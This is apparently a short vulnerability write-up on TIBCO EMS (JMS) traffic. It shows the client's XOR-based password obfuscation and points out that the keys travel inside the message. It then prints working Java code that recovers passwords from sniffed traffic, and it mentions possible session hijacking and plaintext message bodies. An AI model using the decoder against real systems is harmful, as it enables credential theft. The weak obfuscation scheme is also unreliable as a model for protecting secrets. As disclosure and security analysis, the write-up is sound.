EMS Traffic

Password field is functionally something between hashed and encryped value (XOR with random and shifting key):

int len = pass.length;
int lenPadded;
if(len % 16 != 0)
lenPadded = (len / 16 + 1) * 16 + 4;
else
lenPadded = len + 4;
byte pwd[] = new byte[lenPadded];
Random random = new Random(System.currentTimeMillis());
System.arraycopy(pass, 0, pwd, 4, pass.length);
for(int k = len + 4; k < lenPadded; k++)
pwd[k] = (byte)random.nextInt();

int i;
do
i = random.nextInt();
while(i == 0 || i == -1);

byte byte1 = (byte)i;
byte byte2 = (byte)(i >> 8);
pwd[0] = byte1;
pwd[1] = byte2;
pwd[2] = (byte)(len + 7777 ^ pwd[1]);
pwd[3] = (byte)(len + 7777 >> 8 ^ pwd[0]);
for(int l = 4; l < lenPadded; l++) {
byte byte0 = l % 2 == 0 ? byte1 : byte2;
pwd[l] = (byte)(pwd[l] ^ byte0);
int j = byte0 & 1;
byte0 >>= 1;
if(j != 0)
byte0 |= 128;
else
byte0 &= 127;
if(l % 2 != 0)
byte2 = byte0;
else
byte1 = byte0;
}
return pwd;

Have you noticed that keys are left in pwd at indices 0 and 1 ?!

Here is how to get password from sniffed JMS communication:

byte1 = pwd[0];
byte2 = pwd[1];
for (int z=4; z < pwd.length; z++) {
byte byte0 = z % 2 == 0 ? byte1 : byte2;
char c = (char)(byte)(pwd[z]^byte0);
if (!Character.isDefined(c))
break;
System.out.print(c);
int j = byte0 & 1;
byte0 >>= 1;
if(j != 0)
byte0 |= 128;
else
byte0 &= 127;
if(z % 2 != 0)
byte2 = byte0;
else
byte1 = byte0;
}

Damn, they could use Diffie-Hellman for these 2 keys and don't store them in the message and they would be secure! The key size of 8 bits is also a totally brilliant idea.

Session id is just a JMS message property of long type. If EMS server doesn't have proper state management per TCP/IP JMS Connection, in theory, it would be possible to hijack JMS session.

Message body goes in plain text.